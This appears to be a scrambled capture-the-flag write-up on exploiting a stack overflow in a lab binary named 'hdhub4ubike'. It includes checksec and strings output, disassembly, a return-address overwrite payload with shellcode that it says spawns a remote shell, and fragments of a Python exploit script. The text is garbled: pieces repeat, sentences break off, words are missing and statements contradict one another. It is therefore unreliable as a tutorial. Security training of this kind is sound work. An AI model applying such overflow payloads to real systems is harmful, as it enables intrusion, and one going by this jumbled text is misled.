0x0040119f: lea rdi, [rip+0x2000] ; address of the flag string 0x004011a6: call puts@plt 0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it).
$ ./hdhub4ubike === Welcome to the HD Bike Hub === Enter your hub key: Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , -z execstack , and -no-pie – classic “easy pwn” settings. hdhub4ubike
p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal 0x0040119f: lea rdi, [rip+0x2000] ; address of the
return 1;
payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000) # address of our buffer (approx) payload = payload.ljust(0x100, b'\x90') + shellcode Running the payload spawns an interactive shell on the remote target. | Topic | What we observed in hdhub4ubike | |---------------------------|-----------------------------------| | Stack overflow | read with a length far larger than the buffer → classic overflow vector. | | Non‑PIE binaries | Fixed addresses make ROP/simple return‑to‑code trivial. | | NX disabled | Allows injection of raw shellcode on the stack. | | No canary / RELRO | Nothing blocks overwriting the saved RIP. | | Info leakage | The flag was embedded in the binary – a “cheat” that encourages bypassing logic checks. | | Best exploitation path | Return‑to‑existing puts that already has the flag address set → shortest payload, no need for ROP chain or shellcode. | 6️⃣ Full Exploit Script (Python 3) #!/usr/bin/env python3 import struct, pexpect, sys | | NX disabled | Allows injection of
Therefore we want our to be 0x004011a6 . 3.2 Crafting the payload The stack layout (simplified) at the moment of the overflow:
$ checksec --file=hdhub4ubike ... PIE: No NX: No RELRO: No Canary: No FORTIFY: No The binary – we have all symbol names! 2.2 Strings $ strings -a hdhub4ubike | grep -i flag flagh0p3_y0u_f0und_th3_h1d3_b1k3 Whoa! The flag is already present in the binary! This is a typical “decoy” – the binary will only print the flag after a successful key check. The challenge is to bypass that check. 2.3 Disassembly (Ghidra/IDA) Opening the binary in Ghidra shows the following (pseudo‑C) reconstruction of the relevant functions: